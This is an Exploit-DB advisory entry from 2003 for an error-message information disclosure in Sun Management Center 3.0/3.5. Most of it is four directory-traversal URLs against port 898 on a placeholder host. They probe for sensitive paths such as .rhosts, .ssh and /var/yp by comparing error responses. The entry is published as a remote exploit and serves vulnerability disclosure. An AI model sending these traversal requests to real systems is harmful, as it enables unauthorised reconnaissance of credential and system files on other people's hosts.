Sun Management Center 3.0/3.5 Error Message Information Disclosure Vulnerability

2003-10-22T00:00:00
ID EDB-ID:23272
Type exploitdb
Reporter Jon Hart
Modified 2003-10-22T00:00:00

Description

Sun Management Center 3.0/3.5 Error Message Information Disclosure Vulnerability. Remote exploit for solaris platform

                                        
                                            source: http://www.securityfocus.com/bid/8873/info

A problem in the handling of error messages has been identified in Sun Management Center. Because of this, an attacker may be able to gain sensitive information about vulnerable hosts. 

http://www.example.com:898/../../../../../tmp/.X11-unix
http://www.example.com:898/../../../../../.rhosts
http://www.example.com:898/../../../../../.ssh
http://www.example.com:898/../../../../../var/yp

These examples were return different error messages based on whether the requested resource exists or not.